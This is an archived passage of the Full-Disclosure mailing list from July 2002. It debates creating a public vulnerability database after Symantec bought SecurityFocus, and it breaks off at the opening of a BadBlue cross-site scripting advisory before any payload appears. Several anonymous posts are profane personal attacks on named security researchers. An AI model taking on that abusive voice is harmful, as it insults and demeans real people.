being exploited, and also how it is going to affect my systems, rather...
tedious.

I also think that tying them to the open source tools, or leaving it open
so that they could be, would also be a great idea. Having to find
up-to-date signatures for all of the security software is another task
that could be easily automated with something like that.
I know that there are other reasons being discussed on this list about
the idea of the public vuln database, but, I just thought that I would
throw out my $0.02.

--Chris

Christopher Meiklejohn
cmeik at gawble.net

From coley at linus.mitre.org  Fri Jul 19 21:42:13 2002
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 19 Jul 2002 16:42:13 -0400 (EDT)
Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database
Message-ID: <200207192042.QAA24360@linus.mitre.org>

Jay D. Dyson said:

> Look, I have nothing against someone trying to make a buck. That
> is the cornerstone of the capitalist system. What burns my biscuits is
> that the monolithic security companies are not making this money off their
> own efforts[1], but by leeching off the egalitarian contributions of those
> who possess a skill set the businesses are not willing to pay for.

With organizations like CERT/CC projecting 4,000+ vulnerabilities this
year alone, the amount of research and quality-checking that is
required to maintain a good vulnerability database is growing
prohibitive, even if most of the vulnerabilities were discovered and
announced by many people in the community.

As suggested by others, a publicly maintained vulnerability database
is a possibility, but it would need a large-scale community effort to
populate and maintain, and there would be issues of quality control.

Maintaining a vulnerability database also requires some different
skills than vulnerability research or system administration:

- a stronger emphasis on writing for multiple audiences (technical
  details and high-level summaries)

- identifying different technical areas and finding/keeping skilled
  people to cover them (e.g.
  crypto, Linux kernels, CGI, programming languages, etc.)

- defining what will be in the database (this was an issue in the
  early days of CVE because everyone has different definitions of
  "vulnerability," and it's still an issue to some degree)

- ironing out details like workaround and fix information (even
  determining whether the vendor has fixed the problem can be a
  challenge; researcher-suggested patches can be broken; some
  workarounds aren't feasible)

- trying to distinguish between closely related vulnerabilities (is
  there one vulnerability or two? Did vendor X and Y really fix the
  same issue? Did vendor W's fix really address researcher Z's report
  from two months earlier?)

- deciding on a severity metric (IMHO, high/medium/low must die)

- getting consistent terminology (your XSS is not my XSS (or CSS)!
  Same with remote/local, directory traversal, etc.)

- ensuring accuracy of information (which is sometimes problematic
  even in "full disclosure" instances)

- actually validating whether the reported vulnerabilities are real or
  not (a daunting challenge for anything but the most commonly
  deployed products and configurations)

- then designing, implementing, and maintaining the databases and the
  server(s) that support it.

Chris Wysopal said:

>Even so a completely non-corporate and free vuln database would be
>something good for the community.

NIST's ICAT database (http://icat.nist.gov) is freely available for
download. It is built on top of the CVE list. Unfortunately, that
means that some of CVE's challenges pose difficulties for ICAT,
e.g. with respect to CVE's delays in making candidate numbers
available after an issue has been disclosed. (BTW, we're focusing on
improving our timeliness, which should improve noticeably in the
coming months.)
If everyone is serious about building and maintaining their own open
vulnerability database, then consider using the following resources:

1) Working group reports from the 2nd vulnerability database workshop
   at Purdue CERIAS, January 1999, especially the appendices.

   There is some good discussion regarding issues in creating "open"
   or "federated" vulnerability databases.

   http://www.cs.purdue.edu/coast/papers/99-06.ps

   (Google offers this file in text format, but the document structure
   is lost a little. http://citeseer.nj.nec.com/meunier99final.html
   may provide alternate formats)

2) Purdue CERIAS has done some followup work in trying to create a
   public vulnerability database.

   "Sharing Vulnerability Information using a Taxonomically-correct,
   Web-based Cooperative Database"

   https://www.cerias.purdue.edu/papers/archive/2001-03.pdf

Steve Christey
CVE Editor

From fdlist at digitaloffense.net  Fri Jul 19 21:59:51 2002
From: fdlist at digitaloffense.net (H D Moore)
Date: Fri, 19 Jul 2002 15:59:51 -0500
Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database
Message-ID: <200207191559.51346.fdlist@digitaloffense.net>

(sent this from the wrong account earlier, moderators please ignore the
previous post)

On Friday 19 July 2002 15:38, Chris Wysopal wrote:
> So would you use a non-profit database that was populated by the
> vulnerability reporters themselves? That is what I am proposing.

I just started a similar project. Have about two dozen volunteers and am
working on the first draft docs for schema, requirements, moderation, and
licensing. The domain/project name is osvdb.org, the goal is to provide a
community-run vulnerability database catering to the needs of system
administrators and security professionals alike. We were planning on
doing this earlier, even went so far as to hire someone to create a nice
Oracle schema, but lacked the time and urgency to do it until now.
One of the primary goals is to allow user feedback on vulnerabilities,
such as problems applying patches in a given environment or exploiting
the bug on a specific architecture. The submission process will have to
be moderated, moderators would be volunteers from the industry who would
like to contribute to something immediately useful.

My company, Digital Defense, has committed to populating the database
with our own in-house data set, which should at least get the ball
rolling. Much of the correlation work has already been done, so
integrating CVE/BID/Nessus/Snort references should be pretty far along
from the beginning.

Licensing terms will probably be GPLv2, we want OSS developers to be able
to use exports from the database for their own tool reporting. While I
would like to prevent commercial scan-in-a-box companies from abusing it,
there's no licensing system I can think of that will prevent that but
still allow consultants to provide reports using the verbiage. Plagiarism
is absolutely not allowed, only exception being quotes from the Vendor
pertaining to the product, and those must be noted as such.

Below is a mini-announcement that was sent in reply to Jay's post on the
Nessus mailing list...

---

To: "Jay D. Dyson"
Date: Thu, 18 Jul 2002 03:53:24 -0500

On Wednesday 17 July 2002 17:47, Jay D. Dyson wrote:
> On 18 Jul 2002, Michel Arboi wrote:
> > Just curious: will they consider the Nessus community as "trusted
> > security researchers" or as a gang of dangerous terrorists?
> >
> > Should we ask them? Just like this?
>
> Yes and yes.
>
> I may catch hell for this, but I see the corporate community as
> not exactly having the Open Source world's best interests at heart. Just
> have a look at the sort of legislation and lobbying they carry out under
> the guise of "security." It's enough to make a body swear off computing
> forever...
After talking to a SF employee and reading the two announcements that
were sent out, this is the impression that I got: Symantec is allowing
the mailing lists and SF web site to be operated just as it was
previously by the same people. Their disclosure policy only applies to
vulnerabilities *found* by them, it has no bearing whatsoever on the list
traffic or exploits on the web site. The only piece I am worried about is
whether not-quite-public-bugs, such as those reported through the
vuln-help list or during vendor coordination, will be made known to
"trusted security researchers" at Symantec before release.

Symantec could always change their mind later, making all of the above
null and void, but considering the dedication of the Security Focus staff
and their full-disclosure views, I am willing to give it a chance and see
how things work out. Regardless, the deal is not final until August
sometime.

On another note, an open source vulnerability database project has been
started. This database will be filled and maintained by the community,
providing complete support for CVE, Bugtraq, Nessus, and Snort. We are
still in the design phase, gathering requirements from system
administrators and pen-testers alike, hashing out the table structure,
and deciding where to host it. Myself and a few of the DDI staff are
going to populate it with what we can, but once the interface is up and
volunteers are found, it will be in the hands of the community. The
database will be exportable in a number of different formats and can be
included and used by open source security tools. There may be some
restrictions on commercial use (no sense keeping the idiots in business),
but those restrictions will have to be approved by the community first.

If you have any suggestions, ideas, questions, flames, or just want to
get involved; please email them to osvdb at digitaloffense.net for the
time being.
-HD

-------------------------------------------------------

From pmeunier at cerias.purdue.edu  Fri Jul 19 22:17:36 2002
From: pmeunier at cerias.purdue.edu (Pascal Meunier)
Date: Fri, 19 Jul 2002 16:17:36 -0500
Subject: [Full-Disclosure] Re: Creating a publicly maintained vulnerability database
In-Reply-To: <200207192042.QAA24360@linus.mitre.org>
References: <200207192042.QAA24360@linus.mitre.org>
Message-ID:

We have just overhauled our cooperative vulnerability database (fixing
many bugs), adding an exploit section with IDS rules, and modifying it to
allow the use of a moderation process instead of a 3-reviewer process.
What is interesting about it is that anybody can improve a record by
working on a copy and submitting it so that it will supersede the
original. As a basis it imports CVE information daily but it is not bound
by it. One drawback to it is that operational policies have not been
clearly defined; another is that there currently isn't enough information
in it.

Please have a look; accounts are and will remain free. We will keep
working on it. Feel free to make suggestions too, for features or
operational policies. At this point, I would very much like to know what
else it would take for the community to get involved in it, and I am
willing to share the stewardship with interested individuals and
companies.

It is publicly accessible at:
https://cirdb.cerias.purdue.edu/coopvdb/public/

Cheers,
Pascal Meunier
Assistant Research Scientist, CERIAS

At 4:42 PM -0400 7/19/02, Steven M. Christey wrote:
>Jay D. Dyson said:
>
>> Look, I have nothing against someone trying to make a buck. That
>> is the cornerstone of the capitalist system. What burns my biscuits is
>> that the monolithic security companies are not making this money off their
>> own efforts[1], but by leeching off the egalitarian contributions of those
>> who possess a skill set the businesses are not willing to pay for.
>
>With organizations like CERT/CC projecting 4,000+ vulnerabilities this
>year alone, the amount of research and quality-checking that is
>required to maintain a good vulnerability database is growing
>prohibitive, even if most of the vulnerabilities were discovered and
>announced by many people in the community.
>
>As suggested by others, a publicly maintained vulnerability database
>is a possibility, but it would need a large-scale community effort to
>populate and maintain, and there would be issues of quality control.
>
>Maintaining a vulnerability database also requires some different
>skills than vulnerability research or system administration:
>
>- a stronger emphasis on writing for multiple audiences (technical
>  details and high-level summaries)
>
>- identifying different technical areas and finding/keeping skilled
>  people to cover them (e.g. crypto, Linux kernels, CGI, programming
>  languages, etc.)
>
>- defining what will be in the database (this was an issue in the
>  early days of CVE because everyone has different definitions of
>  "vulnerability," and it's still an issue to some degree)
>
>- ironing out details like workaround and fix information (even
>  determining whether the vendor has fixed the problem can be a
>  challenge; researcher-suggested patches can be broken; some
>  workarounds aren't feasible)
>
>- trying to distinguish between closely related vulnerabilities (is
>  there one vulnerability or two? Did vendor X and Y really fix the
>  same issue? Did vendor W's fix really address researcher Z's report
>  from two months earlier?)
>
>- deciding on a severity metric (IMHO, high/medium/low must die)
>
>- getting consistent terminology (your XSS is not my XSS (or CSS)!
>  Same with remote/local, directory traversal, etc.)
>
>- ensuring accuracy of information (which is sometimes problematic
>  even in "full disclosure" instances)
>
>- actually validating whether the reported vulnerabilities are real or
>  not (a daunting challenge for anything but the most commonly
>  deployed products and configurations)
>
>- then designing, implementing, and maintaining the databases and the
>  server(s) that support it.
>
>
>
>Chris Wysopal said:
>
>>Even so a completely non-corporate and free vuln database would be
>>something good for the community.
>
>NIST's ICAT database (http://icat.nist.gov) is freely available for
>download. It is built on top of the CVE list. Unfortunately, that
>means that some of CVE's challenges pose difficulties for ICAT,
>e.g. with respect to CVE's delays in making candidate numbers
>available after an issue has been disclosed. (BTW, we're focusing on
>improving our timeliness, which should improve noticeably in the
>coming months.)
>
>
>If everyone is serious about building and maintaining their own open
>vulnerability database, then consider using the following resources:
>
>1) Working group reports from the 2nd vulnerability database workshop
>   at Purdue CERIAS, January 1999, especially the appendices.
>
>   There is some good discussion regarding issues in creating "open"
>   or "federated" vulnerability databases.
>
>   http://www.cs.purdue.edu/coast/papers/99-06.ps
>
>   (Google offers this file in text format, but the document structure
>   is lost a little. http://citeseer.nj.nec.com/meunier99final.html
>   may provide alternate formats)
>
>2) Purdue CERIAS has done some followup work in trying to create a
>   public vulnerability database.
>
>   "Sharing Vulnerability Information using a Taxonomically-correct,
>   Web-based Cooperative Database"
>
>   https://www.cerias.purdue.edu/papers/archive/2001-03.pdf
>
>
>
>Steve Christey
>CVE Editor

--
Pascal Meunier, Ph.D., M.Sc.
Assistant Research Scientist, CERIAS
Purdue University

From coastalhope at hushmail.com Fri Jul 19 22:58:13 2002
From: coastalhope at hushmail.com (coastalhope at hushmail.com)
Date: Fri, 19 Jul 2002 14:58:13 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among
Message-ID: <200207192158.g6JLwDK54242@mailserver4.hushmail.com>

> - ----------
> Fat Checks Are Good Biz
> They buy warm houses for March
> Is yours made of glass?

>>OK, so now the idiots who don't have the necessary social skills to get
>>paying jobs start tossing rocks at those who work for a living.

I have worked with you Steve (Manzuik) and you might want to consider the glass house analogy again. You are commonly perceived by co-workers to have the personality of a carrion bird and the social skills to match.

>Yeah, fat
>checks are a good biz you are damn right, and what is wrong with that? If
>you are good at something, go get a job doing that which you are good at.
>How can you fault someone for that?

I bet you must respect that quite a bit. Especially since you cannot hold a job in this industry for more than a year at a time. How many employers now in the last 3 years? 5?

>>Weld Pond has contributed more to the
>>security industry in general than half the fucks on this list INCLUDING
>>ME! It is no surprise that his skills are in demand, do you expect him to
>>flip burgers for a living?

You say 'INCLUDING ME' like you've actually contributed something. Aside from starting mailing lists your net contribution has been 0.

>>I consider both Jay and Chris to not only be true hackers but to also be
>>friends. So other than a
>>bit of common sense what is the hidden agenda?

You realize you are judged by the company you keep? Weld is a vacillating idiot who rode Mudge's coat tails to success and Jay has less luck with jobs than you do. Probably because he often forgets to take his meds. I doubt securityfocus has much to worry about with idiots like you people rallying to the cause.
ch

Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

From Ken.Williams at ey.com Fri Jul 19 23:04:08 2002
From: Ken.Williams at ey.com (Ken.Williams at ey.com)
Date: Fri, 19 Jul 2002 17:04:08 -0500
Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database
Message-ID:

> Message: 6
> Date: Fri, 19 Jul 2002 16:42:13 -0400 (EDT)
> From: "Steven M. Christey"
> To: full-disclosure at lists.netsys.com
> Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database
> Reply-To: full-disclosure at lists.netsys.com
>
> With organizations like CERT/CC projecting 4,000+ vulnerabilities this
> year alone, the amount of research and quality-checking that is
> required to maintain a good vulnerability database is growing
> prohibitive, even if most of the vulnerabilities were discovered and
> announced by many people in the community.

as usual, Steve hit the nail smack on the head. back when i owned (and almost singlehandedly maintained) PacketStorm (PSS), i only had to deal with a few hundred vulns/year. i put in 80+ hour weeks, but i got it done (for the most part). now, with the number of vulns reaching 4000+ per year, it really does take a team of highly skilled researchers to maintain a vuln db. i know exactly what kind of people it takes, and i know just how interesting (and boring) the work can be, because i am currently spending about 180% (70+ hrs/wk) of my salaried time maintaining vuln dbs and managing a team that researches and validates vulns.

> As suggested by others, a publicly maintained vulnerability database
> is a possibility, but it would need a large-scale community effort to
> populate and maintain, and there would be issues of quality control.

maintenance and quality control become huge issues when you have to process 4000+ vulns/yr.
finding people who know what gdb is AND spell correctly AND can legally work in the US AND are willing to work for less than $160,000/yr AND show up for work every day AND can pass a simple background check can also be a challenge.

> Maintaining a vulnerability database also requires some different
> skills than vulnerability research or system administration:
>
> - a stronger emphasis on writing for multiple audiences (technical
>   details and high-level summaries)

and if you want a really useful vuln db, you need both tech details and hi-level summaries.

> - identifying different technical areas and finding/keeping skilled
>   people to cover them (e.g. crypto, Linux kernels, CGI, programming
>   languages, etc.)

and you have to have this too if you actually want the content in your vuln db to be validated. and what good is the vuln db if the content is NOT validated??? i have yet to see a single attempt at a public vuln db that contains VALIDATED CONTENT. CVE comes closest (the content is very well validated), but it is of course a vuln dictionary rather than a vuln database.

> - defining what will be in the database (this was an issue in the
>   early days of CVE because everyone has different definitions of
>   "vulnerability," and it's still an issue to some degree)

and being the perfectionist that i am, i want ALL of it in the db.

> - ironing out details like workaround and fix information (even
>   determining whether the vendor has fixed the problem can be a
>   challenge; researcher-suggested patches can be broken; some
>   workarounds aren't feasible)

and if the vuln db is going to really be useful, you will make sure to have all of the patch info, the vendor info, the 3rd party patches, and the workarounds. different people are going to need different solutions.

> - trying to distinguish between closely related vulnerabilities (is
>   there one vulnerability or two? Did vendor X and Y really fix the
>   same issue?
>   Did vendor W's fix really address researcher Z's report
>   from two months earlier?)

stop it Steve! my head already hurts without your mentioning this.

> - deciding on a severity metric (IMHO, high/medium/low must die)

and training all of the people who maintain your database to fully understand and consistently apply that metric is another issue.

> - getting consistent terminology (your XSS is not my XSS (or CSS)!
>   Same with remote/local, directory traversal, etc.)
>
> - ensuring accuracy of information (which is sometimes problematic
>   even in "full disclosure" instances)

independent validation is the only good answer, and this will consume 89.54% of your time.

> - actually validating whether the reported vulnerabilities are real or
>   not (a daunting challenge for anything but the most commonly
>   deployed products and configurations)

especially tough if you are a small, public, non-profit org and you don't have the $$$ to purchase the technology affected by the vuln (and the vendor won't give you a copy - not even an eval copy that may be different from the full licensed version mentioned in the original vuln advisory).

> - then designing, implementing, and maintaining the databases and the
>   server(s) that support it.

seems like many of the private, for-profit databases focus on this aspect, at the expense of the content. imo, the container is entirely useless if the content isn't there.

> Chris Wysopal said:
>
> >Even so a completely non-corporate and free vuln database would be
> >something good for the community.
>
> NIST's ICAT database (http://icat.nist.gov) is freely available for

---[snipped stuff about icat and cerias]---

unfortunately, neither of those projects has offered a truly comprehensive and timely vuln db yet. until and unless some benevolent entity provides big $$$ to fund such an endeavor, i doubt we'll be seeing a quality, comprehensive (i want exploit code too!), *validated*, public vuln db any time soon.
ICAT ain't bad though - it needs to be more timely and provide more info for each vuln.

> Steve Christey
> CVE Editor

if i burn out and have to retire to the beaches of n. san fran, i will be calling Steve and asking him to be my sponsor at Vulnerabilities Anonymous.

Regards,
kw

Ken Williams ; CISSP ; Technical Lead ; CVE Editorial Board
eSecurityOnline - an eSecurity Venture of Ernst & Young
ken.williams at ey.com ; www.esecurityonline.com ; 1-877-eSecurity

________________________________________________________________________
The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer. Thank you. Ernst & Young LLP

From coastalhope at hushmail.com Fri Jul 19 23:39:50 2002
From: coastalhope at hushmail.com (coastalhope at hushmail.com)
Date: Fri, 19 Jul 2002 15:39:50 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among
Message-ID: <200207192239.g6JMdoA58034@mailserver4.hushmail.com>

>Nice an anonymous reply from someone too chicken shit to use his real
>name and yet he seems to think he knows a thing or two about me.

A thing or two is about where your entertainment value starts to dwindle. If there are more interesting things to know about you please feel free to share.

>Interesting none of my clients, employees, or other co-workers feel this
>way. Again, it's nice to see that you don't have the balls to use your
>real name in this post.

You are either woefully stupid (I am voting on that) or you have a short memory.
You have left many people in your wake who would rather eat razor blades than work with you again.

>Again, you know nothing about me or my employment situation. It hasn't
>been 5 in three years, but nice try. Not that I owe some pussy too
>afraid to use his real name an explanation but let's review the last
>three years;
>

Has your stupidity finally encroached on your memory? Your review comes up short. Much like your IQ.

>> You say 'INCLUDING ME' like you've actually contributed
>> something. Aside from starting mailing lists your net
>> contribution has been 0.
>
>Learn how to read assclown. I said that Weld/L0pht have contributed
>much more than I have. And yeah dumb fuck I have contributed a bit and
>plan on contributing more in the future.

Contributing more than you have is hardly a noteworthy event. One-eyed man being king in the kingdom of the blind and all that.

From mxe20 at psu.edu Sat Jul 20 00:06:23 2002
From: mxe20 at psu.edu (Mark Earnest)
Date: Fri, 19 Jul 2002 19:06:23 -0400 (EDT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among
In-Reply-To: <200207192239.g6JMdoA58034@mailserver4.hushmail.com>
Message-ID:

Perhaps this is off topic here, but were there plans at any point to discuss security issues and report on vulnerabilities on this mailing list? Would it be too much to ask that the pissing matches be taken off list?
--
Mark Earnest
~~~~~~~~~~~~
Senior Systems Programmer
ASET/Emerging Technologies
Penn State University
Email: mxe20 at psu.edu
Office Phone: 814-863-2064
Public Key - http://mearnest.oas.psu.edu/gpgkey.txt

From madduck at debian.org Sat Jul 20 00:12:42 2002
From: madduck at debian.org (martin f krafft)
Date: Sat, 20 Jul 2002 01:12:42 +0200
Subject: [Full-Disclosure] ANNOUNCING: Debian GNU/Linux 3.0
Message-ID: <20020719231242.GA10546@fishbowl.madduck.net>

We wouldn't want to keep this from your eyes, Full disclosure it is, and while this isn't a vulnerability, I am sure it will interest quite a few. It is, after all, security related and long awaited...

http://www.debian.org/News/2002/20020719

Thank you, Debian!!!

--
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

a c programmer asked whether computers have buddha's nature.
as the answer, the master did "rm -rf" on the programmer's home directory.
and then the c programmer became enlightened...

From haiku at hushmail.com Sat Jul 20 00:28:26 2002
From: haiku at hushmail.com (haiku at hushmail.com)
Date: Fri, 19 Jul 2002 16:28:26 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID: <200207192328.g6JNSQW63259@mailserver4.hushmail.com>

>As a consulting company that publishes vulnerability information and tools,
>we contribute to the pool that we drink out of.

Oh. So this is your argument.
You contribute to it, therefore you may use it? Wait .... I thought you said the information should be free for non-commercial use. Does not taking from the pool to use within a company constitute commercial use? Genius! So, the "do as I say and not as I do" applies here? What other double-standards are we also applying in this discussion?

You know, Chris, you really puzzle me. You look a person holding a very sharp axe in their hand directly in the eye, then you put your neck on the block. And you know DAMN WELL I'm going to bring this fucker right down on you. As you wish.

So, now that we've clarified that there is, in fact, a double-standard here, this would explain why a certain vicious rumor about the @stake toolkit that somehow found the light of day contains not only many, many publicly available exploits, but also some 0day that the vendors have yet to fix. Tell me, Chris, I'm a little confused how this applies to both "Responsible Disclosure" and "information being free for non-commercial use." From my take, there's nothing responsible whatsoever about possessing, and distributing a toolkit that contains exploits for problems that aren't even fixed. To me, it also doesn't constitute "non-commercial use" that this rumored toolkit is used by @stake pen testers when they're at a gig.

Why Johnny Ringo .... you look like somebody just walked over your grave.

>So would you use a non-profit database that was populated by the
>vulnerability reporters themselves? That is what I am proposing.

Chris, hellNbak AKA Steve Manzuik can't even read an email, get the point, and intelligently respond. And he moderates a fucking mailing list! You've got to be shitting me. Oh, btw Steve, when I want to talk to you, I'll initiate the conversation; I have little time to waste on your innate ability to read and not comprehend.

What about the folks that don't speak English as a first language, or no English whatsoever? In short, yeah, you could say I'm skeptical.
And what's going to stop other information security companies from using it anyway? If the data is freely available, it's there for the harvest. If you want to prevent it from being exploited by outside parties, you have to neuter it to where there's no details whatsoever. Then, it becomes roughly tits on a boar.

FYI, as I recall, the information in the Bugtraq Database is freely available to the public through their web site anyways. Perhaps you may have overlooked this.

>For wanting a public vulnerability database? This is what the security
>community is currently missing in a public and open format. There are open
>source NIDS, vuln scanners, and other security tools. There are public
>security mailing lists. There is a public vuln dictionary, CVE. But there
>is no public vuln database. Why is everything else good to have
>non-commercial alternatives for except a vuln database? The open source
>tools could tie into it.

The open source tools could tie into it. Open Source != Non-Commercial. Ok, as I recall, Renaud was at least making a little money off his project by offering support, while the rest of these pentest dirtbags exploiting Nessus (oh yeah, that's right, the alleged @Stake toolkit had Nessus sigs, did it not?) for whatever fee. Now, correct me if I'm wrong here, but first, doesn't this mean that Renaud would no longer be able to offer commercial support for his product? I think so. And I believe the same applies to Marty, as Sourcefire is offering commercial products built on Snort. Gee, what a fucking HUGE hole in your logic. And, you additionally fuck them in the process. Good job.

>I certainly didn't mention restricting information. A public vulnerability
>database would require the information to be open so that it could be in
>the database.

Ok, so you have a database that can be used commercially, or you don't. Notice how there's no fucking in-between? And what if a person wants to use the "non-commercial database" in their commercial product?
Does this now require a licensing fee? Or do you just turn them away? This has sham written all over it. And of course, how does this differ from the Bugtraq Database?

>@stake employees have contributed to the Snort project. I actually was
>using Snort earlier today on a product pen test. It's great. Marty has
>created something wonderful. A public vulnerability database would enhance
>Snort not hurt it. We don't really do implementation work but we have
>recommended to some of our customers that they install Snort.

Horseshit. Non-commercial != Public, and vice-versa. The Bugtraq Database is public. How does Marty benefit from the database by no longer being able to use it? It sure as hell doesn't help his commercial venture, as near as I can tell.

>You can support the First Amendment and still limit what you personally say
>and write. I choose not to be vulgar in my list postings and I might even
>advocate for others to not be vulgar but I would never want to ban that
>language. I think it is a benefit to security if people can patch their
>boxes before exploits are written. Nothing is a single bullet solution but
>I think that certain disclosure practices can help make this happen.
>Obviously a lot has to be done better on the vendor side. So while
>advocating for people to follow certain disclosure practices I still don't
>think there should be a law restricting free speech. Once someone has
>chosen to publish information they are going to publish it. It is better
>for the community that VulnWatch approve these messages so that everyone
>can get the information at the same time.

I really wish you weren't so two-faced, paradoxical, and self-righteous. And on that note, how does this make VulnWatch any different from any other security mailing list? Securiteam does the same thing. This list allegedly does the same thing. Bugtraq does the same thing.

Bottom-line, there's going to be people that make money off security information whether you like it or not.
@Stake does. SecurityFocus does. ISS does. NAI does. Even CERT does. Welcome to the capitalist world; leave your agendas and egos at the door. Any company that uses information/software provided by them tends to make money, as they spend less time down due to security incidents. Funny how economics work, isn't it? If you don't like it, might I recommend you move to Cuba? I hear they're still communist there, and you may find their way of thinking more in line with yours. I'd suspect you're not going to enjoy the same standard of living, though.

haiku

From evrim at core.gen.tr Sat Jul 20 00:34:03 2002
From: evrim at core.gen.tr (evrim at core.gen.tr)
Date: Sat, 20 Jul 2002 02:34:03 +0300 (EEST)
Subject: [Full-Disclosure] show must go on w/ or w/o secfocus.
Message-ID: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr>

hi,

Finally I've found the right place to discuss secfocus. I'm 22 years old and I've some questions in my mind. Maybe people here may know the answers:

1. Why did we not argue when geek-girl transformed into secfocus? Nothing has changed. One firm bought another. Secfocus was also making money from the work of all of us. (This is maybe cos' aleph1)

2. Everybody here knows that we need a database on this planet to learn more for fun or for profit because no one can know every hole in every os. So, who can guarantee that another list is not going to be acquired again in the future?

3. $75 million is very cheap. Does all the vuln-information cost $75? I really don't think so.

4. A license is a must but how can we build a license for our vuln-info including exploits/methods? I don't think this is possible cos' every os has an owner and all material we're working with belongs to them.

5. Do we really need a center like old geek-girl/new secfocus in order to be informed about the community and development? Of course yes. So, only a commercial firm can build/maintain a system that can serve all of us 7/24. But we are talking about a nonprofit vulnbase. How can this be built? *that I really don't know*.

IMHOs:

a) I think there will be a new vulnbase center and this will be very near to some security geek somewhere on this world. But the community will decide who will be the guy.
b) I am a volunteer if there is an existing vulnbase/portal project. (I've made one portal before, maybe helpful: core.gen.tr) Just send me info.
c) In addition to these I'm sure that nobody here wants to spend time on where we're going to post our research. It's useless. Instead we just want to spend time on our research.

Thnx.
evrim.
evrim at core.gen.tr

From core at bokeoa.com Sat Jul 20 00:54:29 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Fri, 19 Jul 2002 17:54:29 -0600
Subject: [Full-Disclosure] ANNOUNCING: Debian GNU/Linux 3.0
References: <20020719231242.GA10546@fishbowl.madduck.net>
Message-ID: <3D38A6B5.6020507@bokeoa.com>

Woohoo!

peace,
core

martin f krafft wrote:
> We wouldn't want to keep this from your eyes, Full disclosure it is,
> and while this isn't a vulnerability, I am sure it will interest quite
> a few. It is, after all, security related and long awaited...
>
> http://www.debian.org/News/2002/20020719
>
> Thank you, Debian!!!
>

From netsys at machine.org.uk Sat Jul 20 00:56:15 2002
From: netsys at machine.org.uk (Tim Brown)
Date: Sat, 20 Jul 2002 00:56:15 +0100
Subject: [Full-Disclosure] Lets get on-topic
In-Reply-To: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr>
References: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr>
Message-ID: <200207192356.g6JNurII019960@firewall.home>

All,

Speaking as someone who's only recently become involved in security research, I don't know about anyone else here, but I think there would be more interesting research if people didn't get into public slanging matches, particularly those who profess to be more experienced in security matters. I've seen one on-topic posting in 22 since I joined this list on Thursday.

Tim

--
Tim Brown

From mattmurphy at kc.rr.com Sat Jul 20 01:38:23 2002
From: mattmurphy at kc.rr.com (Matthew Murphy)
Date: Fri, 19 Jul 2002 19:38:23 -0500
Subject: [Full-Disclosure] BadBlue 302 Status Message XSS
Message-ID: <00ef01c22f85$c10855e0$e62d1c41@kc.rr.com>

BadBlue 1.74 (presumably earlier) is susceptible to a cross-site scripting attack. When BadBlue is passed the name of a non-existent file path (or an existent folder) that does not end in a 0x2f character ("/"), it returns a 302 status code containing some text:

HTTP/1.0 302 found
Location: /